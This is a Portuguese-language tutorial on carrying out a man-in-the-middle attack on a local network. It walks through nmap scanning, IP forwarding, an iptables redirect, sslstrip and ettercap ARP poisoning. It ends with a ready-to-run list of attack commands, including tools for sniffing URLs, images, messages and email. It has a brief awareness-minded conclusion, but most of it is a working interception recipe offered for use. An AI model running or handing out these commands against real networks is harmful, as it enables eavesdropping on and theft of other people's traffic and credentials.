Man in The Middle - Aprenda o Que É e Como Realizar
Man in The Middle - Aprenda o Que É e Como Realizar
Man in The Middle - Aprenda o Que É e Como Realizar
Abraho Eneias
Depois de ter ganhado o acesso ao roteador o atacante passa a escutar todo o trfego da rede. Isso
pode acontecer devido ao roteador estar corrompido, por falhas na instalao e configurao do
mesmo e at por firmware e protocolos de segurana desatualizados (alis, isso um dos principais
motivos de ataques). O MITM um tipo de ataque relativamente fcil de se realizar.
O comando route serve para nos apresentar quais as rotas que os pacotes da rede iro tomar.
Na Fig. 02, o comando route nos apresenta a rota default que no caso o meu roteador.
O comando nmap (Network Map) na Fig. 03 serve para varrer uma determinada faixa de IP's
e mostrar os hosts ativos, sua sada ter a tela a seguir, fig. 04. Mas o nmap no se limita a
apresentar apenas os hosts ativos, dentre suas funes destacam-se:
varreduras de IP's ativos numa rede;
varreduras de portas e seus respectivos servioslevantados;
verificar sistema operacional do alvo e sua verso.
claro que existem inmeras funes e opes fornecidas pelo nmap. Existem no mercado
vrios livros que tratam do assunto, da se percebe o quo poderoso o Nmap.
Vale a pena o leitor ou leitora gastar um pouco do seu tempo para pesquisar sobre a
ferramenta.
Na varredura realizada foram encontrados 5 hosts up, isto , 5 dispositivos que esto
conectados na minha redes. Ofusquei os endereos MAC por motivos de segurana.
Podemos ver tambm as portas e servios utilizados pelo gateway: portas 22 (ssh), 53
(DNS), 80 (http) e 443 (http seguro).
O comando na tela est habilitando o redirecionamento dos pacotes que trafegam em sua
rede.
O comando sslstrip, far o papel do ouvinte, ou seja, ele que estar verificando os
pacotes trafegados na rede, uma vez que o firewall estar redirecionando todo o trafego para a porta
8080.
O comando driftnet serve para exibir as imagens em tempo real que os sites acessados
apresentam. Veja um exemplo na figura abaixo, so apresentadas as imagens de sites que acessei.
Para quem quer se aprofundar mais, existem outros comando que podemos usar e ampliar
nossa forma de ataque, veja abaixo alguns:
msgsnarf -i (interface)
Verifica as mensagens trafegadas.
mailsnarf -i (interface)
Verifica e-mails trafegados.
dsniff -i (interface)
Atua como sniffador.
Concluso
A cada dia novas formas de ataques virtuais surgem. Devemos no apenas sermos usurios
de tecnologia, mas preciso conhecer seus funcionamentos para podermos entender suas fraquezas
e, assim, evitar sermos vtimas de bandidos virtuais.
Uma breve pesquisada na Internet nos mostrar que nossos dados trafegando na rede so
muito vulnerveis. Entender e encontrar solues para esses problemas deve ser uma atividade
constante no apenas de empresas mas de todos os usurios da Internet.
Comandos utilizados
route
nmap ip-do-gateway/24
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -a -l 8080
ettercap -T -q -i (interface) -M arp:remote // //
urlsnarf -i (interface)
driftnet -i (interface)
*interface faz referncia a sua placa de rede.